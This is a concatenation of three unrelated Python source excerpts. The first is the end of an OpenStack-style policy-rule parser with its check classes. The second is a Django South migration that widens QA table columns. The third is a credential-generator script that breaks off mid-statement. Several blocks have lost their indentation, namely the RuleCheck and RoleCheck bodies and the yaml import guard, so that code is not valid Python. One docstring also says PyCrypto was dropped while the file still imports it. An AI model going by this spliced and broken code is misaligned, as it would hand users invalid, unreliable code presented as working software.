    Note: error reporting is rather lacking. The best we can get with
    this parser formulation is an overall "parse failed" error.
    Fortunately, the policy language is simple enough that this
    shouldn't be that big a problem.
    """
    def __init__(self):
        """Initialize the ParseState."""
        # Parallel stacks: token kinds and their associated values.
        self.tokens = []
        self.values = []
    def reduce(self):
        """Perform a greedy reduction of the token stream.

        If a reducer method matches, it will be executed, then the
        reduce() method will be called recursively to search for any more
        possible reductions.
        """
        # `reducers` is injected by ParseStateMeta from the @reducer
        # decorations below.
        for reduction, methname in self.reducers:
            if (len(self.tokens) >= len(reduction) and
                    self.tokens[-len(reduction):] == reduction):
                # Get the reduction method
                meth = getattr(self, methname)
                # Reduce the token stream
                results = meth(*self.values[-len(reduction):])
                # Update the tokens and values
                self.tokens[-len(reduction):] = [r[0] for r in results]
                self.values[-len(reduction):] = [r[1] for r in results]
                # Check for any more reductions
                return self.reduce()
    def shift(self, tok, value):
        """Adds one more token to the state. Calls reduce()."""
        self.tokens.append(tok)
        self.values.append(value)
        # Do a greedy reduce...
        self.reduce()
    @property
    def result(self):
        """Obtain the final result of the parse.

        Raises ValueError if the parse failed to reduce to a single result.
        """
        if len(self.values) != 1:
            raise ValueError("Could not parse rule")
        return self.values[0]
    @reducer('(', 'check', ')')
    @reducer('(', 'and_expr', ')')
    @reducer('(', 'or_expr', ')')
    def _wrap_check(self, _p1, check, _p2):
        """Turn parenthesized expressions into a 'check' token."""
        return [('check', check)]
    @reducer('check', 'and', 'check')
    def _make_and_expr(self, check1, _and, check2):
        """Create an 'and_expr'.

        Join two checks by the 'and' operator.
        """
        return [('and_expr', AndCheck([check1, check2]))]
    @reducer('and_expr', 'and', 'check')
    def _extend_and_expr(self, and_expr, _and, check):
        """Extend an 'and_expr' by adding one more check."""
        return [('and_expr', and_expr.add_check(check))]
    @reducer('check', 'or', 'check')
    def _make_or_expr(self, check1, _or, check2):
        """Create an 'or_expr'.

        Join two checks by the 'or' operator.
        """
        return [('or_expr', OrCheck([check1, check2]))]
    @reducer('or_expr', 'or', 'check')
    def _extend_or_expr(self, or_expr, _or, check):
        """Extend an 'or_expr' by adding one more check."""
        return [('or_expr', or_expr.add_check(check))]
    @reducer('not', 'check')
    def _make_not_expr(self, _not, check):
        """Invert the result of another check."""
        return [('check', NotCheck(check))]
def _parse_text_rule(rule):
    """Parses policy to the tree.

    Translates a policy written in the policy language into a tree of
    Check objects.

    :param rule: policy-language expression; an empty/falsy rule always
                 passes.
    :returns: the root Check of the parsed tree; TrueCheck for an empty
              rule, FalseCheck if the rule cannot be parsed (fail closed).
    """
    # Empty rule means always accept
    if not rule:
        return TrueCheck()

    # Parse the token stream
    state = ParseState()
    for tok, value in _parse_tokenize(rule):
        state.shift(tok, value)

    try:
        return state.result
    except ValueError:
        # Couldn't parse the rule.  Pass ``rule`` as a lazy logging
        # argument instead of eagerly %-formatting it ourselves, so
        # formatting only happens if the record is actually emitted.
        LOG.exception(_("Failed to understand rule %r"), rule)
        # Fail closed
        return FalseCheck()
def parse_rule(rule):
    """Parses a policy rule into a tree of Check objects."""
    # Non-string rules are assumed to be in the list-based representation.
    if not isinstance(rule, six.string_types):
        return _parse_list_rule(rule)
    # String rules are written in the policy language.
    return _parse_text_rule(rule)
def register(name, func=None):
    """Register a function or Check class as a policy check.

    :param name: Gives the name of the check type, e.g., 'rule',
                 'role', etc.  If name is None, a default check type
                 will be registered.
    :param func: If given, provides the function or class to register.
                 If not given, returns a function taking one argument
                 to specify the function or class to register,
                 allowing use as a decorator.
    """
    def decorator(check):
        # Perform the actual decoration by recording the check under its
        # type name; return it for compliance with the decorator interface.
        _checks[name] = check
        return check

    # Direct-call form: register immediately.
    if func:
        return decorator(func)
    # Decorator form: defer until the target is known.
    return decorator
@register("rule")
class RuleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Recursively checks credentials based on the defined rules."""
try:
return enforcer.rules[self.match](target, creds, enforcer)
except KeyError:
# We don't have any matching rule; fail closed
return False
@register("role")
class RoleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check that there is a matching role in the cred dict."""
return self.match.lower() in [x.lower() for x in creds['roles']]
@register('http')
class HttpCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check http: rules by calling to a remote server.

        This example implementation simply verifies that the response
        is exactly 'True'.

        :param target: dict interpolated into the URL template and sent
                       as JSON to the remote server.
        :param creds: credentials dict, sent as JSON to the server.
        :returns: True only when the remote server answers 'True'.
        """
        url = ('http:' + self.match) % target
        data = {'target': jsonutils.dumps(target),
                'credentials': jsonutils.dumps(creds)}
        # urlopen requires a bytes body under Python 3.
        post_data = urlparse.urlencode(data).encode('utf-8')
        f = urlrequest.urlopen(url, post_data)
        # The response body is bytes under Python 3; decode before
        # comparing, otherwise the check would always be False there.
        return f.read().decode('utf-8') == "True"
@register(None)
class GenericCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check an individual match.

        Matches look like:

            tenant:%(tenant_id)s
            role:compute:admin
            True:%(user.enabled)s
            'Member':%(role.name)s
        """
        # TODO(termie): do dict inspection via dot syntax
        try:
            match = self.match % target
        except KeyError:
            # While doing GenericCheck if key not
            # present in Target return false
            return False
        try:
            # Try to interpret self.kind as a literal
            leftval = ast.literal_eval(self.kind)
        except (ValueError, SyntaxError):
            # literal_eval raises ValueError for non-literal names and
            # SyntaxError for malformed expressions (e.g. 'compute:admin');
            # in both cases fall back to a credentials lookup instead of
            # letting the exception escape the enforcement call.
            try:
                leftval = creds[self.kind]
            except KeyError:
                return False
        return match == six.text_type(leftval)
|
|
# -*- coding: utf-8 -*-
from south.db import db, engine
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
    """South migration: widen name/slug columns on several qa tables.

    The ``models`` attribute below is South's frozen ORM snapshot of the
    schema after this migration — it is generated data, not hand-written
    model code, and should not be edited by hand.
    """

    def forwards(self, orm):
        """Apply the migration: widen the name/slug columns to 255 chars."""
        # Changing field 'Category.slug'
        db.alter_column('qa_category', 'slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255))
        # Changing field 'Category.name'
        db.alter_column('qa_category', 'name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255))
        # Changing field 'Reference.name'
        db.alter_column('qa_reference', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
        # Changing field 'Test.name'
        db.alter_column('qa_test', 'name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255))
        # SQL Server cannot alter an indexed column, so drop the 'name'
        # indexes first and recreate them after the alters below.
        if 'sql_server' in engine:
            sql_server_idxs = (('qa_testlist', 'name'), ('qa_testlistcycle', 'name'),)
            for table_name, column_name in sql_server_idxs:
                try:
                    db.drop_index(table_name, column_name)
                except:
                    # Best effort: the index may not exist on this database.
                    pass
                # sqlserver_utils.drop_index(db,table_name,column_name)
        # Changing field 'TestList.name'
        db.alter_column('qa_testlist', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
        # Changing field 'TestListCycle.name'
        db.alter_column('qa_testlistcycle', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
        if 'sql_server' in engine:
            for table_name, column_name in sql_server_idxs:
                db.create_index(table_name, [column_name])

    def backwards(self, orm):
        """Reverse the migration (columns retain max_length=255)."""
        # Changing field 'Category.slug'
        db.alter_column('qa_category', 'slug', self.gf('django.db.models.fields.SlugField')(max_length=255, unique=True))
        # Changing field 'Category.name'
        db.alter_column('qa_category', 'name', self.gf('django.db.models.fields.CharField')(max_length=255, unique=True))
        # Changing field 'Reference.name'
        db.alter_column('qa_reference', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
        # Changing field 'Test.name'
        db.alter_column('qa_test', 'name', self.gf('django.db.models.fields.CharField')(max_length=255, unique=True))
        # Changing field 'TestList.name'
        db.alter_column('qa_testlist', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
        # Changing field 'TestListCycle.name'
        db.alter_column('qa_testlistcycle', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))

    # South's frozen ORM description (auto-generated; do not hand-edit).
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'qa.category': {
            'Meta': {'object_name': 'Category'},
            'description': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
        },
        'qa.frequency': {
            'Meta': {'ordering': "('nominal_interval',)", 'object_name': 'Frequency'},
            'due_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
            'nominal_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'overdue_interval': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
        },
        'qa.reference': {
            'Meta': {'object_name': 'Reference'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reference_creators'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reference_modifiers'", 'to': "orm['auth.User']"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'type': ('django.db.models.fields.CharField', [], {'default': "'numerical'", 'max_length': '15'}),
            'value': ('django.db.models.fields.FloatField', [], {})
        },
        'qa.test': {
            'Meta': {'object_name': 'Test'},
            'calculation_procedure': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Category']"}),
            'choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
            'constant_value': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_creator'", 'to': "orm['auth.User']"}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_modifier'", 'to': "orm['auth.User']"}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
            'procedure': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
            'type': ('django.db.models.fields.CharField', [], {'default': "'simple'", 'max_length': '10'})
        },
        'qa.testinstance': {
            'Meta': {'ordering': "('work_completed',)", 'object_name': 'TestInstance'},
            'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_instance_creator'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_instance_modifier'", 'to': "orm['auth.User']"}),
            'pass_fail': ('django.db.models.fields.CharField', [], {'max_length': '20', 'db_index': 'True'}),
            'reference': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Reference']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'review_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            'skipped': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestInstanceStatus']"}),
            'test_list_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListInstance']", 'null': 'True', 'blank': 'True'}),
            'tolerance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Tolerance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'unit_test_info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.UnitTestInfo']"}),
            'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
            'work_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
            'work_started': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
        },
        'qa.testinstancestatus': {
            'Meta': {'object_name': 'TestInstanceStatus'},
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'export_by_default': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
            'requires_comment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'requires_review': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
            'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
        },
        'qa.testlist': {
            'Meta': {'object_name': 'TestList'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlist_created'", 'to': "orm['auth.User']"}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlist_modified'", 'to': "orm['auth.User']"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
            'sublists': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['qa.TestList']", 'null': 'True', 'blank': 'True'}),
            'tests': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['qa.Test']", 'through': "orm['qa.TestListMembership']", 'symmetrical': 'False'})
        },
        'qa.testlistcycle': {
            'Meta': {'object_name': 'TestListCycle'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlistcycle_created'", 'to': "orm['auth.User']"}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'qa_testlistcycle_modified'", 'to': "orm['auth.User']"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
            'test_lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['qa.TestList']", 'through': "orm['qa.TestListCycleMembership']", 'symmetrical': 'False'})
        },
        'qa.testlistcyclemembership': {
            'Meta': {'ordering': "('order',)", 'object_name': 'TestListCycleMembership'},
            'cycle': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListCycle']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"})
        },
        'qa.testlistinstance': {
            'Meta': {'ordering': "('work_completed',)", 'object_name': 'TestListInstance'},
            'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_list_instance_creator'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'test_list_instance_modifier'", 'to': "orm['auth.User']"}),
            'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"}),
            'unit_test_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.UnitTestCollection']"}),
            'work_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
            'work_started': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'})
        },
        'qa.testlistmembership': {
            'Meta': {'ordering': "('order',)", 'unique_together': "(('test_list', 'test'),)", 'object_name': 'TestListMembership'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
            'test': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Test']"}),
            'test_list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestList']"})
        },
        'qa.tolerance': {
            'Meta': {'object_name': 'Tolerance'},
            'act_high': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'act_low': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tolerance_creators'", 'to': "orm['auth.User']"}),
            'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mc_pass_choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
            'mc_tol_choices': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
            'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tolerance_modifiers'", 'to': "orm['auth.User']"}),
            'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
            'tol_high': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'tol_low': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
        },
        'qa.unittestcollection': {
            'Meta': {'ordering': "('testlist__name', 'testlistcycle__name')", 'unique_together': "(('unit', 'frequency', 'content_type', 'object_id'),)", 'object_name': 'UnitTestCollection'},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'frequency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Frequency']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestListInstance']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.Unit']"}),
            'visible_to': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[]', 'related_name': "'test_collection_visibility'", 'symmetrical': 'False', 'to': "orm['auth.Group']"})
        },
        'qa.unittestinfo': {
            'Meta': {'unique_together': "(['test', 'unit'],)", 'object_name': 'UnitTestInfo'},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
            'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.TestInstance']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
            'reference': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Reference']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'test': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Test']"}),
            'tolerance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['qa.Tolerance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.Unit']"})
        },
        'units.modality': {
            'Meta': {'unique_together': "[('type', 'energy')]", 'object_name': 'Modality'},
            'energy': ('django.db.models.fields.FloatField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
        },
        'units.unit': {
            'Meta': {'ordering': "['number']", 'object_name': 'Unit'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'install_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'modalities': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['units.Modality']", 'symmetrical': 'False'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'number': ('django.db.models.fields.PositiveIntegerField', [], {'unique': 'True'}),
            'serial_number': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['units.UnitType']"})
        },
        'units.unittype': {
            'Meta': {'unique_together': "[('name', 'model')]", 'object_name': 'UnitType'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'vendor': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }

    complete_apps = ['qa']
|
|
#!/usr/bin/env python
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# (c) 2014, Kevin Carter <kevin.carter@rackspace.com>
import argparse
import datetime
import hashlib
import os
import random
import tarfile
import uuid
from Crypto import Random
try:
import yaml
except ImportError:
raise SystemExit('Missing Dependency, "PyYAML"')
class CredentialGenerator(object):
    """Credential generator class.

    This class is simply a method to generate random secrets. This class will
    NOT encrypt values rather it creates the values which will be used as
    secrets within an application. The credential generator will return
    strings in various sizes based on the requested secret type.

    There are four secret types that can be used within the class;
    `password`, `token`, `secret`, and `key`. These types return variable
    lengths of data:

        password: 16 - 64 character string
        secret:   16 - 64 character string
        token:    64 - 72 character string
        key:      24, or 32 character string (Needs to be AES compatible)

    Usage:

        >>> generator = CredentialGenerator()
        >>> token = generator.generator('token')
    """

    def generator(self, pw_type):
        """Generate new secret string.

        Looks up the private ``_<pw_type>_gen`` method and, if found, feeds
        it a freshly hashed random hex string.

        :param pw_type: ``str`` Type of secret to generate.
        :returns: ``str``
        :raises SystemExit: if ``pw_type`` is not a known secret type.
        """
        gen_func = getattr(self, '_%s_gen' % pw_type, None)
        if gen_func is None:
            raise SystemExit('Unknown secret type passed. [ %s ]' % pw_type)
        return gen_func(encoded_bytes=self._encode_bytes())

    @staticmethod
    def _random_bytes():
        """Returns 1024 random bytes of data.

        Uses ``os.urandom`` (the OS CSPRNG) instead of the abandoned
        PyCrypto ``Random`` module; the contract is unchanged.
        """
        return os.urandom(1024)

    def _encode_bytes(self):
        """Builds random strings based on random data.

        `_encode_bytes` will ensure that there's never an opportunity for
        duplicate data. Once the bytes are generated, they are hashed using
        SHA512 and then returned as a **hex** digest (128 hex characters).
        """
        random_bytes = self._random_bytes()
        hash_obj = hashlib.sha512(random_bytes)
        return hash_obj.hexdigest()

    def _password_gen(self, encoded_bytes):
        """Returns ``str`` with a length between 16 and 64.

        :param encoded_bytes: ``str`` must be at least 64 characters long
        """
        return encoded_bytes[:random.randrange(16, 64)]

    # The class contract advertises a 'secret' type; it behaves exactly
    # like 'password'.  Without this alias generator('secret') would raise.
    _secret_gen = _password_gen

    def _token_gen(self, encoded_bytes):
        """Returns ``str`` with a length between 64 and 72.

        :param encoded_bytes: ``str`` must be at least 72 characters long
        """
        return encoded_bytes[:random.randrange(64, 72)]

    def _key_gen(self, encoded_bytes):
        """Returns ``str`` with a length of 24 or 32.

        Length restriction are required for key type secrets because of
        requirements in AES.

        :param encoded_bytes: ``str`` must be at least 32 characters long
        """
        return encoded_bytes[:random.choice([24, 32])]
def args():
    """Set up and run the command line argument parser.

    :returns: ``dict`` mapping argument names to their parsed values.
    """
    arg_parser = argparse.ArgumentParser(
        usage='%(prog)s',
        description='OpenStack Token Password and Key Generator',
        epilog='Inventory Generator Licensed "Apache 2.0"'
    )
    arg_parser.add_argument(
        '--file',
        required=True,
        default=None,
        help='User defined configuration file'
    )
    arg_parser.add_argument(
        '--regen',
        action='store_true',
        default=False,
        help='Regenerate all passwords'
    )
    return vars(arg_parser.parse_args())
def main():
    """Run the main Application.

    This will open a file that was specified on the command line. The file
    specified is assumed to be in valid YAML format, which is used in ansible.
    When the YAML file will be processed and any key with a null value that
    ends with 'password', 'token', 'key' or 'uuid' will have a generated
    password set as the value.

    The main function will create a backup of all changes in the file as a
    tarball in the same directory as the file specified.

    Command line usage has one required argument and one optional. The
    argument ``--file`` is used to specify the file which passwords will be
    generated within. The argument ``--regen`` is used to regenerate all
    secrets within a file even if they were already set.
    """
    all_args = args()
    user_vars_file = all_args['file']
    user_vars_file = os.path.abspath(
